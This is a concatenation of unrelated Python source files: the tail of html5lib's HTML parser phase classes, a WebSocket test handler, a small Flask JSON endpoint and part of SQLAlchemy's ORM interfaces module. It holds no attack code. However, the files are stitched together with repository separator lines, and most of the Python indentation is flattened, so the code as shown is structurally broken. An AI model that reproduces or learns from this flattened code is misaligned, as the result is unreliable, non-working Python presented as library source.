if (self.tree.elementInScope("tbody", variant="table") or
self.tree.elementInScope("thead", variant="table") or
self.tree.elementInScope("tfoot", variant="table")):
self.clearStackToTableBodyContext()
self.endTagTableRowGroup(
impliedTagToken(self.tree.openElements[-1].name))
return token
else:
# innerHTML case
assert self.parser.innerHTML
self.parser.parseError()
def startTagOther(self, token):
return self.parser.phases["inTable"].processStartTag(token)
def endTagTableRowGroup(self, token):
if self.tree.elementInScope(token["name"], variant="table"):
self.clearStackToTableBodyContext()
self.tree.openElements.pop()
self.parser.phase = self.parser.phases["inTable"]
else:
self.parser.parseError("unexpected-end-tag-in-table-body",
{"name": token["name"]})
def endTagTable(self, token):
if (self.tree.elementInScope("tbody", variant="table") or
self.tree.elementInScope("thead", variant="table") or
self.tree.elementInScope("tfoot", variant="table")):
self.clearStackToTableBodyContext()
self.endTagTableRowGroup(
impliedTagToken(self.tree.openElements[-1].name))
return token
else:
# innerHTML case
assert self.parser.innerHTML
self.parser.parseError()
def endTagIgnore(self, token):
self.parser.parseError("unexpected-end-tag-in-table-body",
{"name": token["name"]})
def endTagOther(self, token):
return self.parser.phases["inTable"].processEndTag(token)
class InRowPhase(Phase):
# http://www.whatwg.org/specs/web-apps/current-work/#in-row
def __init__(self, parser, tree):
Phase.__init__(self, parser, tree)
self.startTagHandler = _utils.MethodDispatcher([
("html", self.startTagHtml),
(("td", "th"), self.startTagTableCell),
(("caption", "col", "colgroup", "tbody", "tfoot", "thead",
"tr"), self.startTagTableOther)
])
self.startTagHandler.default = self.startTagOther
self.endTagHandler = _utils.MethodDispatcher([
("tr", self.endTagTr),
("table", self.endTagTable),
(("tbody", "tfoot", "thead"), self.endTagTableRowGroup),
(("body", "caption", "col", "colgroup", "html", "td", "th"),
self.endTagIgnore)
])
self.endTagHandler.default = self.endTagOther
# helper methods (XXX unify this with other table helper methods)
def clearStackToTableRowContext(self):
while self.tree.openElements[-1].name not in ("tr", "html"):
self.parser.parseError("unexpected-implied-end-tag-in-table-row",
{"name": self.tree.openElements[-1].name})
self.tree.openElements.pop()
def ignoreEndTagTr(self):
return not self.tree.elementInScope("tr", variant="table")
# the rest
def processEOF(self):
self.parser.phases["inTable"].processEOF()
def processSpaceCharacters(self, token):
return self.parser.phases["inTable"].processSpaceCharacters(token)
def processCharacters(self, token):
return self.parser.phases["inTable"].processCharacters(token)
def startTagTableCell(self, token):
self.clearStackToTableRowContext()
self.tree.insertElement(token)
self.parser.phase = self.parser.phases["inCell"]
self.tree.activeFormattingElements.append(Marker)
def startTagTableOther(self, token):
ignoreEndTag = self.ignoreEndTagTr()
self.endTagTr(impliedTagToken("tr"))
# XXX how are we sure it's always ignored in the innerHTML case?
if not ignoreEndTag:
return token
def startTagOther(self, token):
return self.parser.phases["inTable"].processStartTag(token)
def endTagTr(self, token):
if not self.ignoreEndTagTr():
self.clearStackToTableRowContext()
self.tree.openElements.pop()
self.parser.phase = self.parser.phases["inTableBody"]
else:
# innerHTML case
assert self.parser.innerHTML
self.parser.parseError()
def endTagTable(self, token):
ignoreEndTag = self.ignoreEndTagTr()
self.endTagTr(impliedTagToken("tr"))
# Reprocess the current tag if the tr end tag was not ignored
# XXX how are we sure it's always ignored in the innerHTML case?
if not ignoreEndTag:
return token
def endTagTableRowGroup(self, token):
if self.tree.elementInScope(token["name"], variant="table"):
self.endTagTr(impliedTagToken("tr"))
return token
else:
self.parser.parseError()
def endTagIgnore(self, token):
self.parser.parseError("unexpected-end-tag-in-table-row",
{"name": token["name"]})
def endTagOther(self, token):
return self.parser.phases["inTable"].processEndTag(token)
class InCellPhase(Phase):
# http://www.whatwg.org/specs/web-apps/current-work/#in-cell
def __init__(self, parser, tree):
Phase.__init__(self, parser, tree)
self.startTagHandler = _utils.MethodDispatcher([
("html", self.startTagHtml),
(("caption", "col", "colgroup", "tbody", "td", "tfoot", "th",
"thead", "tr"), self.startTagTableOther)
])
self.startTagHandler.default = self.startTagOther
self.endTagHandler = _utils.MethodDispatcher([
(("td", "th"), self.endTagTableCell),
(("body", "caption", "col", "colgroup", "html"), self.endTagIgnore),
(("table", "tbody", "tfoot", "thead", "tr"), self.endTagImply)
])
self.endTagHandler.default = self.endTagOther
# helper
def closeCell(self):
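            # Close any open td or th so that a new cell or row can start.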
if self.tree.elementInScope("td", variant="table"):
self.endTagTableCell(impliedTagToken("td"))
elif self.tree.elementInScope("th", variant="table"):
self.endTagTableCell(impliedTagToken("th"))
# the rest
def processEOF(self):
self.parser.phases["inBody"].processEOF()
def processCharacters(self, token):
return self.parser.phases["inBody"].processCharacters(token)
def startTagTableOther(self, token):
if (self.tree.elementInScope("td", variant="table") or
self.tree.elementInScope("th", variant="table")):
self.closeCell()
return token
else:
# innerHTML case
assert self.parser.innerHTML
self.parser.parseError()
def startTagOther(self, token):
return self.parser.phases["inBody"].processStartTag(token)
def endTagTableCell(self, token):
if self.tree.elementInScope(token["name"], variant="table"):
self.tree.generateImpliedEndTags(token["name"])
if self.tree.openElements[-1].name != token["name"]:
self.parser.parseError("unexpected-cell-end-tag",
{"name": token["name"]})
while True:
node = self.tree.openElements.pop()
if node.name == token["name"]:
break
else:
self.tree.openElements.pop()
self.tree.clearActiveFormattingElements()
self.parser.phase = self.parser.phases["inRow"]
else:
self.parser.parseError("unexpected-end-tag", {"name": token["name"]})
def endTagIgnore(self, token):
self.parser.parseError("unexpected-end-tag", {"name": token["name"]})
def endTagImply(self, token):
if self.tree.elementInScope(token["name"], variant="table"):
self.closeCell()
return token
else:
# sometimes innerHTML case
self.parser.parseError()
def endTagOther(self, token):
return self.parser.phases["inBody"].processEndTag(token)
class InSelectPhase(Phase):
def __init__(self, parser, tree):
Phase.__init__(self, parser, tree)
self.startTagHandler = _utils.MethodDispatcher([
("html", self.startTagHtml),
("option", self.startTagOption),
("optgroup", self.startTagOptgroup),
("select", self.startTagSelect),
(("input", "keygen", "textarea"), self.startTagInput),
("script", self.startTagScript)
])
self.startTagHandler.default = self.startTagOther
self.endTagHandler = _utils.MethodDispatcher([
("option", self.endTagOption),
("optgroup", self.endTagOptgroup),
("select", self.endTagSelect)
])
self.endTagHandler.default = self.endTagOther
# http://www.whatwg.org/specs/web-apps/current-work/#in-select
def processEOF(self):
if self.tree.openElements[-1].name != "html":
self.parser.parseError("eof-in-select")
else:
assert self.parser.innerHTML
def processCharacters(self, token):
if token["data"] == "\u0000":
return
self.tree.insertText(token["data"])
def startTagOption(self, token):
# We need to imply </option> if <option> is the current node.
if self.tree.openElements[-1].name == "option":
self.tree.openElements.pop()
self.tree.insertElement(token)
def startTagOptgroup(self, token):
if self.tree.openElements[-1].name == "option":
self.tree.openElements.pop()
if self.tree.openElements[-1].name == "optgroup":
self.tree.openElements.pop()
self.tree.insertElement(token)
def startTagSelect(self, token):
self.parser.parseError("unexpected-select-in-select")
self.endTagSelect(impliedTagToken("select"))
def startTagInput(self, token):
self.parser.parseError("unexpected-input-in-select")
if self.tree.elementInScope("select", variant="select"):
self.endTagSelect(impliedTagToken("select"))
return token
else:
assert self.parser.innerHTML
def startTagScript(self, token):
return self.parser.phases["inHead"].processStartTag(token)
def startTagOther(self, token):
self.parser.parseError("unexpected-start-tag-in-select",
{"name": token["name"]})
def endTagOption(self, token):
if self.tree.openElements[-1].name == "option":
self.tree.openElements.pop()
else:
self.parser.parseError("unexpected-end-tag-in-select",
{"name": "option"})
def endTagOptgroup(self, token):
# </optgroup> implicitly closes <option>
if (self.tree.openElements[-1].name == "option" and
self.tree.openElements[-2].name == "optgroup"):
self.tree.openElements.pop()
# It also closes </optgroup>
if self.tree.openElements[-1].name == "optgroup":
self.tree.openElements.pop()
# But nothing else
else:
self.parser.parseError("unexpected-end-tag-in-select",
{"name": "optgroup"})
def endTagSelect(self, token):
if self.tree.elementInScope("select", variant="select"):
node = self.tree.openElements.pop()
while node.name != "select":
node = self.tree.openElements.pop()
self.parser.resetInsertionMode()
else:
# innerHTML case
assert self.parser.innerHTML
self.parser.parseError()
def endTagOther(self, token):
self.parser.parseError("unexpected-end-tag-in-select",
{"name": token["name"]})
class InSelectInTablePhase(Phase):
def __init__(self, parser, tree):
Phase.__init__(self, parser, tree)
self.startTagHandler = _utils.MethodDispatcher([
(("caption", "table", "tbody", "tfoot", "thead", "tr", "td", "th"),
self.startTagTable)
])
self.startTagHandler.default = self.startTagOther
self.endTagHandler = _utils.MethodDispatcher([
(("caption", "table", "tbody", "tfoot", "thead", "tr", "td", "th"),
self.endTagTable)
])
self.endTagHandler.default = self.endTagOther
def processEOF(self):
self.parser.phases["inSelect"].processEOF()
def processCharacters(self, token):
return self.parser.phases["inSelect"].processCharacters(token)
def startTagTable(self, token):
self.parser.parseError("unexpected-table-element-start-tag-in-select-in-table", {"name": token["name"]})
self.endTagOther(impliedTagToken("select"))
return token
def startTagOther(self, token):
return self.parser.phases["inSelect"].processStartTag(token)
def endTagTable(self, token):
self.parser.parseError("unexpected-table-element-end-tag-in-select-in-table", {"name": token["name"]})
if self.tree.elementInScope(token["name"], variant="table"):
self.endTagOther(impliedTagToken("select"))
return token
def endTagOther(self, token):
return self.parser.phases["inSelect"].processEndTag(token)
class InForeignContentPhase(Phase):
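        # Start tags for these HTML elements "break out" of foreign content:
        # open SVG/MathML elements are popped until an HTML element or an
        # integration point becomes the current node.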
breakoutElements = frozenset(["b", "big", "blockquote", "body", "br",
"center", "code", "dd", "div", "dl", "dt",
"em", "embed", "h1", "h2", "h3",
"h4", "h5", "h6", "head", "hr", "i", "img",
"li", "listing", "menu", "meta", "nobr",
"ol", "p", "pre", "ruby", "s", "small",
"span", "strong", "strike", "sub", "sup",
"table", "tt", "u", "ul", "var"])
def __init__(self, parser, tree):
Phase.__init__(self, parser, tree)
def adjustSVGTagNames(self, token):
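            # SVG tag names are case-sensitive, but the HTML tokenizer
            # lowercases them, so restore the canonical mixed-case names.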
replacements = {"altglyph": "altGlyph",
"altglyphdef": "altGlyphDef",
"altglyphitem": "altGlyphItem",
"animatecolor": "animateColor",
"animatemotion": "animateMotion",
"animatetransform": "animateTransform",
"clippath": "clipPath",
"feblend": "feBlend",
"fecolormatrix": "feColorMatrix",
"fecomponenttransfer": "feComponentTransfer",
"fecomposite": "feComposite",
"feconvolvematrix": "feConvolveMatrix",
"fediffuselighting": "feDiffuseLighting",
"fedisplacementmap": "feDisplacementMap",
"fedistantlight": "feDistantLight",
"feflood": "feFlood",
"fefunca": "feFuncA",
"fefuncb": "feFuncB",
"fefuncg": "feFuncG",
"fefuncr": "feFuncR",
"fegaussianblur": "feGaussianBlur",
"feimage": "feImage",
"femerge": "feMerge",
"femergenode": "feMergeNode",
"femorphology": "feMorphology",
"feoffset": "feOffset",
"fepointlight": "fePointLight",
"fespecularlighting": "feSpecularLighting",
"fespotlight": "feSpotLight",
"fetile": "feTile",
"feturbulence": "feTurbulence",
"foreignobject": "foreignObject",
"glyphref": "glyphRef",
"lineargradient": "linearGradient",
"radialgradient": "radialGradient",
"textpath": "textPath"}
if token["name"] in replacements:
token["name"] = replacements[token["name"]]
def processCharacters(self, token):
if token["data"] == "\u0000":
token["data"] = "\uFFFD"
elif (self.parser.framesetOK and
any(char not in spaceCharacters for char in token["data"])):
self.parser.framesetOK = False
Phase.processCharacters(self, token)
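        # Start tags: HTML "breakout" elements (and <font> carrying color/
        # face/size) abort foreign content -- pop SVG/MathML nodes until an
        # integration point or an HTML node is current, then reprocess.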
def processStartTag(self, token):
currentNode = self.tree.openElements[-1]
if (token["name"] in self.breakoutElements or
(token["name"] == "font" and
set(token["data"].keys()) & set(["color", "face", "size"]))):
self.parser.parseError("unexpected-html-element-in-foreign-content",
{"name": token["name"]})
while (self.tree.openElements[-1].namespace !=
self.tree.defaultNamespace and
not self.parser.isHTMLIntegrationPoint(self.tree.openElements[-1]) and
not self.parser.isMathMLTextIntegrationPoint(self.tree.openElements[-1])):
self.tree.openElements.pop()
return token
else:
if currentNode.namespace == namespaces["mathml"]:
self.parser.adjustMathMLAttributes(token)
elif currentNode.namespace == namespaces["svg"]:
self.adjustSVGTagNames(token)
self.parser.adjustSVGAttributes(token)
self.parser.adjustForeignAttributes(token)
token["namespace"] = currentNode.namespace
self.tree.insertElement(token)
if token["selfClosing"]:
self.tree.openElements.pop()
token["selfClosingAcknowledged"] = True
def processEndTag(self, token):
nodeIndex = len(self.tree.openElements) - 1
node = self.tree.openElements[-1]
if node.name.translate(asciiUpper2Lower) != token["name"]:
self.parser.parseError("unexpected-end-tag", {"name": token["name"]})
while True:
if node.name.translate(asciiUpper2Lower) == token["name"]:
# XXX this isn't in the spec but it seems necessary
if self.parser.phase == self.parser.phases["inTableText"]:
self.parser.phase.flushCharacters()
self.parser.phase = self.parser.phase.originalPhase
while self.tree.openElements.pop() != node:
assert self.tree.openElements
new_token = None
break
nodeIndex -= 1
node = self.tree.openElements[nodeIndex]
if node.namespace != self.tree.defaultNamespace:
continue
else:
new_token = self.parser.phase.processEndTag(token)
break
return new_token
class AfterBodyPhase(Phase):
def __init__(self, parser, tree):
Phase.__init__(self, parser, tree)
self.startTagHandler = _utils.MethodDispatcher([
("html", self.startTagHtml)
])
self.startTagHandler.default = self.startTagOther
self.endTagHandler = _utils.MethodDispatcher([("html", self.endTagHtml)])
self.endTagHandler.default = self.endTagOther
def processEOF(self):
# Stop parsing
pass
def processComment(self, token):
# This is needed because data is to be appended to the <html> element
# here and not to whatever is currently open.
self.tree.insertComment(token, self.tree.openElements[0])
def processCharacters(self, token):
self.parser.parseError("unexpected-char-after-body")
self.parser.phase = self.parser.phases["inBody"]
return token
def startTagHtml(self, token):
return self.parser.phases["inBody"].processStartTag(token)
def startTagOther(self, token):
self.parser.parseError("unexpected-start-tag-after-body",
{"name": token["name"]})
self.parser.phase = self.parser.phases["inBody"]
return token
        def endTagHtml(self, token):
if self.parser.innerHTML:
self.parser.parseError("unexpected-end-tag-after-body-innerhtml")
else:
self.parser.phase = self.parser.phases["afterAfterBody"]
def endTagOther(self, token):
self.parser.parseError("unexpected-end-tag-after-body",
{"name": token["name"]})
self.parser.phase = self.parser.phases["inBody"]
return token
class InFramesetPhase(Phase):
# http://www.whatwg.org/specs/web-apps/current-work/#in-frameset
def __init__(self, parser, tree):
Phase.__init__(self, parser, tree)
self.startTagHandler = _utils.MethodDispatcher([
("html", self.startTagHtml),
("frameset", self.startTagFrameset),
("frame", self.startTagFrame),
("noframes", self.startTagNoframes)
])
self.startTagHandler.default = self.startTagOther
self.endTagHandler = _utils.MethodDispatcher([
("frameset", self.endTagFrameset)
])
self.endTagHandler.default = self.endTagOther
def processEOF(self):
if self.tree.openElements[-1].name != "html":
self.parser.parseError("eof-in-frameset")
else:
assert self.parser.innerHTML
def processCharacters(self, token):
self.parser.parseError("unexpected-char-in-frameset")
def startTagFrameset(self, token):
self.tree.insertElement(token)
def startTagFrame(self, token):
self.tree.insertElement(token)
self.tree.openElements.pop()
def startTagNoframes(self, token):
return self.parser.phases["inBody"].processStartTag(token)
def startTagOther(self, token):
self.parser.parseError("unexpected-start-tag-in-frameset",
{"name": token["name"]})
def endTagFrameset(self, token):
if self.tree.openElements[-1].name == "html":
# innerHTML case
self.parser.parseError("unexpected-frameset-in-frameset-innerhtml")
else:
self.tree.openElements.pop()
if (not self.parser.innerHTML and
self.tree.openElements[-1].name != "frameset"):
# If we're not in innerHTML mode and the current node is not a
# "frameset" element (anymore) then switch.
self.parser.phase = self.parser.phases["afterFrameset"]
def endTagOther(self, token):
self.parser.parseError("unexpected-end-tag-in-frameset",
{"name": token["name"]})
class AfterFramesetPhase(Phase):
# http://www.whatwg.org/specs/web-apps/current-work/#after3
def __init__(self, parser, tree):
Phase.__init__(self, parser, tree)
self.startTagHandler = _utils.MethodDispatcher([
("html", self.startTagHtml),
("noframes", self.startTagNoframes)
])
self.startTagHandler.default = self.startTagOther
self.endTagHandler = _utils.MethodDispatcher([
("html", self.endTagHtml)
])
self.endTagHandler.default = self.endTagOther
def processEOF(self):
# Stop parsing
pass
def processCharacters(self, token):
self.parser.parseError("unexpected-char-after-frameset")
def startTagNoframes(self, token):
return self.parser.phases["inHead"].processStartTag(token)
def startTagOther(self, token):
self.parser.parseError("unexpected-start-tag-after-frameset",
{"name": token["name"]})
def endTagHtml(self, token):
self.parser.phase = self.parser.phases["afterAfterFrameset"]
def endTagOther(self, token):
self.parser.parseError("unexpected-end-tag-after-frameset",
{"name": token["name"]})
class AfterAfterBodyPhase(Phase):
def __init__(self, parser, tree):
Phase.__init__(self, parser, tree)
self.startTagHandler = _utils.MethodDispatcher([
("html", self.startTagHtml)
])
self.startTagHandler.default = self.startTagOther
def processEOF(self):
pass
def processComment(self, token):
self.tree.insertComment(token, self.tree.document)
def processSpaceCharacters(self, token):
return self.parser.phases["inBody"].processSpaceCharacters(token)
def processCharacters(self, token):
self.parser.parseError("expected-eof-but-got-char")
self.parser.phase = self.parser.phases["inBody"]
return token
def startTagHtml(self, token):
return self.parser.phases["inBody"].processStartTag(token)
def startTagOther(self, token):
self.parser.parseError("expected-eof-but-got-start-tag",
{"name": token["name"]})
self.parser.phase = self.parser.phases["inBody"]
return token
def processEndTag(self, token):
self.parser.parseError("expected-eof-but-got-end-tag",
{"name": token["name"]})
self.parser.phase = self.parser.phases["inBody"]
return token
class AfterAfterFramesetPhase(Phase):
def __init__(self, parser, tree):
Phase.__init__(self, parser, tree)
self.startTagHandler = _utils.MethodDispatcher([
("html", self.startTagHtml),
("noframes", self.startTagNoFrames)
])
self.startTagHandler.default = self.startTagOther
def processEOF(self):
pass
def processComment(self, token):
self.tree.insertComment(token, self.tree.document)
def processSpaceCharacters(self, token):
return self.parser.phases["inBody"].processSpaceCharacters(token)
def processCharacters(self, token):
self.parser.parseError("expected-eof-but-got-char")
def startTagHtml(self, token):
return self.parser.phases["inBody"].processStartTag(token)
def startTagNoFrames(self, token):
return self.parser.phases["inHead"].processStartTag(token)
def startTagOther(self, token):
self.parser.parseError("expected-eof-but-got-start-tag",
{"name": token["name"]})
def processEndTag(self, token):
self.parser.parseError("expected-eof-but-got-end-tag",
{"name": token["name"]})
# pylint:enable=unused-argument
return {
"initial": InitialPhase,
"beforeHtml": BeforeHtmlPhase,
"beforeHead": BeforeHeadPhase,
"inHead": InHeadPhase,
"inHeadNoscript": InHeadNoscriptPhase,
"afterHead": AfterHeadPhase,
"inBody": InBodyPhase,
"text": TextPhase,
"inTable": InTablePhase,
"inTableText": InTableTextPhase,
"inCaption": InCaptionPhase,
"inColumnGroup": InColumnGroupPhase,
"inTableBody": InTableBodyPhase,
"inRow": InRowPhase,
"inCell": InCellPhase,
"inSelect": InSelectPhase,
"inSelectInTable": InSelectInTablePhase,
"inForeignContent": InForeignContentPhase,
"afterBody": AfterBodyPhase,
"inFrameset": InFramesetPhase,
"afterFrameset": AfterFramesetPhase,
"afterAfterBody": AfterAfterBodyPhase,
"afterAfterFrameset": AfterAfterFramesetPhase,
}
def adjust_attributes(token, replacements):
if PY3 or _utils.PY27:
needs_adjustment = viewkeys(token['data']) & viewkeys(replacements)
else:
needs_adjustment = frozenset(token['data']) & frozenset(replacements)
if needs_adjustment:
token['data'] = OrderedDict((replacements.get(k, k), v)
for k, v in token['data'].items())
def impliedTagToken(name, type="EndTag", attributes=None,
selfClosing=False):
if attributes is None:
attributes = {}
return {"type": tokenTypes[type], "name": name, "data": attributes,
"selfClosing": selfClosing}
class ParseError(Exception):
"""Error in parsed document"""
pass
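# A minimal self-check sketch (an editorial addition, not part of html5lib);
# it relies only on names this module already imports (tokenTypes, viewkeys,
# OrderedDict).
if __name__ == "__main__":
    # impliedTagToken synthesizes tokens for implicit tags, e.g. the
    # "</select>" that InSelectInTablePhase fabricates before reprocessing.
    tok = impliedTagToken("select")
    assert tok["name"] == "select" and tok["data"] == {}
    # adjust_attributes renames matching attribute keys in place, as done
    # for the SVG/MathML attribute fixups.
    start = impliedTagToken("svg", type="StartTag",
                            attributes={"viewbox": "0 0 10 10"})
    adjust_attributes(start, {"viewbox": "viewBox"})
    assert "viewBox" in start["data"]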
|
Nashenas88/servo | refs/heads/master | tests/wpt/web-platform-tests/websockets/handlers/handshake_no_protocol_wsh.py | 215 | #!/usr/bin/python
from mod_pywebsocket import common
from mod_pywebsocket.handshake import hybi
def web_socket_do_extra_handshake(request):
    # Write a raw 101 response that deliberately omits the
    # Sec-WebSocket-Protocol header, so clients can test handshakes where no
    # subprotocol is negotiated.
    request.connection.write(
        'HTTP/1.1 101 Switching Protocols\x0D\x0A'
        'Connection: Upgrade\x0D\x0A'
        'Upgrade: WebSocket\x0D\x0A'
        'Sec-WebSocket-Origin: ' + request.ws_origin + '\x0D\x0A'
        'Sec-WebSocket-Accept: ' +
        hybi.compute_accept(
            request.headers_in.get(common.SEC_WEBSOCKET_KEY_HEADER))[0] +
        '\x0D\x0A\x0D\x0A')
def web_socket_transfer_data(request):
    # Nothing to transfer in this test.
    return
|
CallenDevens/Elemetry | refs/heads/master | elemetry-service.py | 1 | from flask import Flask
import json
app = Flask(__name__)
@app.route('/policy-groups')
def getPolicyGroup():
    # Static sample data for now; served as a JSON array.
    groups = [
        {"name": "POL1", "collector": "COL1", "policy": "policy1"},
        {"name": "POL2", "collector": "COL2", "policy": "policy2"},
        {"name": "POL3", "collector": "COL3", "policy": "policy3"},
        {"name": "POL4", "collector": "COL4", "policy": "policy4"},
    ]
    return json.dumps(groups) |
mcus/SickRage | refs/heads/master | lib/sqlalchemy/orm/interfaces.py | 77 | # orm/interfaces.py
# Copyright (C) 2005-2014 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""
Contains various base classes used throughout the ORM.
Defines the now deprecated ORM extension classes as well
as ORM internals.
Other than the deprecated extensions, this module and the
classes within should be considered mostly private.
"""
from __future__ import absolute_import
from .. import exc as sa_exc, util, inspect
from ..sql import operators
from collections import deque
from .base import ONETOMANY, MANYTOONE, MANYTOMANY, EXT_CONTINUE, EXT_STOP, NOT_EXTENSION
from .base import _InspectionAttr, _MappedAttribute
from .path_registry import PathRegistry
import collections
__all__ = (
'AttributeExtension',
'EXT_CONTINUE',
'EXT_STOP',
'ONETOMANY',
'MANYTOMANY',
'MANYTOONE',
'NOT_EXTENSION',
'LoaderStrategy',
'MapperExtension',
'MapperOption',
'MapperProperty',
'PropComparator',
'SessionExtension',
'StrategizedProperty',
)
class MapperProperty(_MappedAttribute, _InspectionAttr):
"""Manage the relationship of a ``Mapper`` to a single class
attribute, as well as that attribute as it appears on individual
instances of the class, including attribute instrumentation,
attribute access, loading behavior, and dependency calculations.
The most common occurrences of :class:`.MapperProperty` are the
mapped :class:`.Column`, which is represented in a mapping as
an instance of :class:`.ColumnProperty`,
and a reference to another class produced by :func:`.relationship`,
represented in the mapping as an instance of
:class:`.RelationshipProperty`.
"""
cascade = frozenset()
"""The set of 'cascade' attribute names.
This collection is checked before the 'cascade_iterator' method is called.
"""
is_property = True
def setup(self, context, entity, path, adapter, **kwargs):
"""Called by Query for the purposes of constructing a SQL statement.
Each MapperProperty associated with the target mapper processes the
statement referenced by the query context, adding columns and/or
criterion as appropriate.
"""
pass
def create_row_processor(self, context, path,
mapper, row, adapter):
"""Return a 3-tuple consisting of three row processing functions.
"""
return None, None, None
def cascade_iterator(self, type_, state, visited_instances=None,
halt_on=None):
"""Iterate through instances related to the given instance for
a particular 'cascade', starting with this MapperProperty.
        Return an iterator of 3-tuples (instance, mapper, state).
Note that the 'cascade' collection on this MapperProperty is
checked first for the given type before cascade_iterator is called.
See PropertyLoader for the related instance implementation.
"""
return iter(())
def set_parent(self, parent, init):
self.parent = parent
def instrument_class(self, mapper): # pragma: no-coverage
raise NotImplementedError()
@util.memoized_property
def info(self):
"""Info dictionary associated with the object, allowing user-defined
data to be associated with this :class:`.MapperProperty`.
The dictionary is generated when first accessed. Alternatively,
it can be specified as a constructor argument to the
:func:`.column_property`, :func:`.relationship`, or :func:`.composite`
functions.
.. versionadded:: 0.8 Added support for .info to all
:class:`.MapperProperty` subclasses.
.. seealso::
:attr:`.QueryableAttribute.info`
:attr:`.SchemaItem.info`
"""
return {}
_configure_started = False
_configure_finished = False
def init(self):
"""Called after all mappers are created to assemble
relationships between mappers and perform other post-mapper-creation
initialization steps.
"""
self._configure_started = True
self.do_init()
self._configure_finished = True
@property
def class_attribute(self):
"""Return the class-bound descriptor corresponding to this
:class:`.MapperProperty`.
This is basically a ``getattr()`` call::
return getattr(self.parent.class_, self.key)
I.e. if this :class:`.MapperProperty` were named ``addresses``,
and the class to which it is mapped is ``User``, this sequence
is possible::
>>> from sqlalchemy import inspect
>>> mapper = inspect(User)
>>> addresses_property = mapper.attrs.addresses
>>> addresses_property.class_attribute is User.addresses
True
>>> User.addresses.property is addresses_property
True
"""
return getattr(self.parent.class_, self.key)
def do_init(self):
"""Perform subclass-specific initialization post-mapper-creation
steps.
This is a template method called by the ``MapperProperty``
object's init() method.
"""
pass
def post_instrument_class(self, mapper):
"""Perform instrumentation adjustments that need to occur
after init() has completed.
"""
pass
def is_primary(self):
"""Return True if this ``MapperProperty``'s mapper is the
primary mapper for its class.
This flag is used to indicate that the ``MapperProperty`` can
define attribute instrumentation for the class at the class
level (as opposed to the individual instance level).
"""
return not self.parent.non_primary
def merge(self, session, source_state, source_dict, dest_state,
dest_dict, load, _recursive):
"""Merge the attribute represented by this ``MapperProperty``
from source to destination object"""
pass
def compare(self, operator, value, **kw):
"""Return a compare operation for the columns represented by
this ``MapperProperty`` to the given value, which may be a
column value or an instance. 'operator' is an operator from
the operators module, or from sql.Comparator.
By default uses the PropComparator attached to this MapperProperty
under the attribute name "comparator".
"""
return operator(self.comparator, value)
def __repr__(self):
return '<%s at 0x%x; %s>' % (
self.__class__.__name__,
id(self), getattr(self, 'key', 'no key'))
class PropComparator(operators.ColumnOperators):
"""Defines boolean, comparison, and other operators for
:class:`.MapperProperty` objects.
SQLAlchemy allows for operators to
be redefined at both the Core and ORM level. :class:`.PropComparator`
is the base class of operator redefinition for ORM-level operations,
including those of :class:`.ColumnProperty`,
:class:`.RelationshipProperty`, and :class:`.CompositeProperty`.
.. note:: With the advent of Hybrid properties introduced in SQLAlchemy
0.7, as well as Core-level operator redefinition in
SQLAlchemy 0.8, the use case for user-defined :class:`.PropComparator`
instances is extremely rare. See :ref:`hybrids_toplevel` as well
as :ref:`types_operators`.
User-defined subclasses of :class:`.PropComparator` may be created. The
built-in Python comparison and math operator methods, such as
:meth:`.operators.ColumnOperators.__eq__`,
:meth:`.operators.ColumnOperators.__lt__`, and
:meth:`.operators.ColumnOperators.__add__`, can be overridden to provide
new operator behavior. The custom :class:`.PropComparator` is passed to
the :class:`.MapperProperty` instance via the ``comparator_factory``
argument. In each case,
the appropriate subclass of :class:`.PropComparator` should be used::
# definition of custom PropComparator subclasses
from sqlalchemy.orm.properties import \\
ColumnProperty,\\
CompositeProperty,\\
RelationshipProperty
class MyColumnComparator(ColumnProperty.Comparator):
def __eq__(self, other):
return self.__clause_element__() == other
class MyRelationshipComparator(RelationshipProperty.Comparator):
def any(self, expression):
"define the 'any' operation"
# ...
class MyCompositeComparator(CompositeProperty.Comparator):
def __gt__(self, other):
"redefine the 'greater than' operation"
return sql.and_(*[a>b for a, b in
zip(self.__clause_element__().clauses,
other.__composite_values__())])
# application of custom PropComparator subclasses
from sqlalchemy.orm import column_property, relationship, composite
from sqlalchemy import Column, String
class SomeMappedClass(Base):
some_column = column_property(Column("some_column", String),
comparator_factory=MyColumnComparator)
some_relationship = relationship(SomeOtherClass,
comparator_factory=MyRelationshipComparator)
some_composite = composite(
Column("a", String), Column("b", String),
comparator_factory=MyCompositeComparator
)
Note that for column-level operator redefinition, it's usually
simpler to define the operators at the Core level, using the
:attr:`.TypeEngine.comparator_factory` attribute. See
:ref:`types_operators` for more detail.
See also:
:class:`.ColumnProperty.Comparator`
:class:`.RelationshipProperty.Comparator`
:class:`.CompositeProperty.Comparator`
:class:`.ColumnOperators`
:ref:`types_operators`
:attr:`.TypeEngine.comparator_factory`
"""
def __init__(self, prop, parentmapper, adapt_to_entity=None):
self.prop = self.property = prop
self._parentmapper = parentmapper
self._adapt_to_entity = adapt_to_entity
def __clause_element__(self):
raise NotImplementedError("%r" % self)
def _query_clause_element(self):
return self.__clause_element__()
def adapt_to_entity(self, adapt_to_entity):
"""Return a copy of this PropComparator which will use the given
:class:`.AliasedInsp` to produce corresponding expressions.
"""
return self.__class__(self.prop, self._parentmapper, adapt_to_entity)
@property
def adapter(self):
"""Produce a callable that adapts column expressions
to suit an aliased version of this comparator.
"""
if self._adapt_to_entity is None:
return None
else:
return self._adapt_to_entity._adapt_element
@util.memoized_property
def info(self):
return self.property.info
@staticmethod
def any_op(a, b, **kwargs):
return a.any(b, **kwargs)
@staticmethod
def has_op(a, b, **kwargs):
return a.has(b, **kwargs)
@staticmethod
def of_type_op(a, class_):
return a.of_type(class_)
def of_type(self, class_):
"""Redefine this object in terms of a polymorphic subclass.
Returns a new PropComparator from which further criterion can be
evaluated.
e.g.::
query.join(Company.employees.of_type(Engineer)).\\
filter(Engineer.name=='foo')
:param \class_: a class or mapper indicating that criterion will be
against this specific subclass.
"""
return self.operate(PropComparator.of_type_op, class_)
def any(self, criterion=None, **kwargs):
"""Return true if this collection contains any member that meets the
given criterion.
The usual implementation of ``any()`` is
:meth:`.RelationshipProperty.Comparator.any`.
:param criterion: an optional ClauseElement formulated against the
member class' table or attributes.
:param \**kwargs: key/value pairs corresponding to member class
attribute names which will be compared via equality to the
corresponding values.
"""
return self.operate(PropComparator.any_op, criterion, **kwargs)
def has(self, criterion=None, **kwargs):
"""Return true if this element references a member which meets the
given criterion.
The usual implementation of ``has()`` is
:meth:`.RelationshipProperty.Comparator.has`.
